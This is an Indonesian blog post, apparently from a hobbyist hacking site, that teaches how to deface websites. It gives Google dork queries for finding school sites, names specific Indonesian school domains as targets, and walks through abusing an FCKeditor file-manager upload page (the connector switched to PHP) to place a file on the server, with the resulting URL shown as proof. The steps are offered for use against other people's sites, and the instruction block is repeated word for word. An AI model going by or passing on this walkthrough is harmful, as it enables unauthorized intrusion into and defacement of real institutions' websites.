Selamat siang sobat. Bertemu lagi, kali ini admin mau update yang mengenai deface website. Gak usah lama lama yah, langsung aja kita liat ini, Cekidott...
1. Siapkan file format .txt. ( bisa di buat di notepad ).
2. Buka Google lalu masukan Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Terserah sobat mau pilih yang mana. Sebagai contoh admin pilih ini aja
sman1kotabaru.sch.id
3. Exploit: /editor/filemanager/connectors/test.html
Kalo bingung masukin Exploit nya, ini contohnya
eX: www.smkn1kuta.sch.id/
di masukin Exploit jadi begini
www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html,
Nahh begitu ujung nya di tambahin :D
Tekan Enter dehh atau masuk kesana , dan akan terlihat seperti ini
Nah sekarang di kolom Connector yang defaultnya ASP jadikan PHP trus resource type nya ganti file. Trus klik Browse....... cari file.txt sobat..........kalo sudah klik open dan klik Upload
1. Siapkan file format .txt. ( bisa di buat di notepad ).
2. Buka Google lalu masukan Dork:
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Terserah sobat mau pilih yang mana. Sebagai contoh admin pilih ini aja
sman1kotabaru.sch.id
3. Exploit: /editor/filemanager/connectors/test.html
Kalo bingung masukin Exploit nya, ini contohnya
eX: www.smkn1kuta.sch.id/
di masukin Exploit jadi begini
www.smkn1kuta.sch.id/editor/filemanager/connectors/test.html,
Nahh begitu ujung nya di tambahin :D
Tekan Enter dehh atau masuk kesana , dan akan terlihat seperti ini
Nah sekarang di kolom Connector yang defaultnya ASP jadikan PHP trus resource type nya ganti file. Trus klik Browse....... cari file.txt sobat..........kalo sudah klik open dan klik Upload
Hasil nya akan seperti gambar yang di atas bila BERHASIL
Selain itu ada kemungkinan gagal. Banyak kemungkinan, mungkin nama file sudah ada sehingga akan menambah sesuatu seperti (1). Ok lanjut, terus cara ngeliat hasil nya
http://www.[site].sch.id/userfiles/file/namafilesobat.txt
http://www.[site].sch.id/userfiles/namafilesobat.txtjadi punya Admin masuk di
http://sman1kotabaru.sch.id/userfiles/file/veristiarta(1).txt bisa di klik untuk melihat hasilnya :D
Screenshoot:
Selesai :D Kamu telah berhasil men-Deface nya walaupun bukan di Index nya (oops :)
Semoga Berhasil dan Semoga Bermanfaat ^_^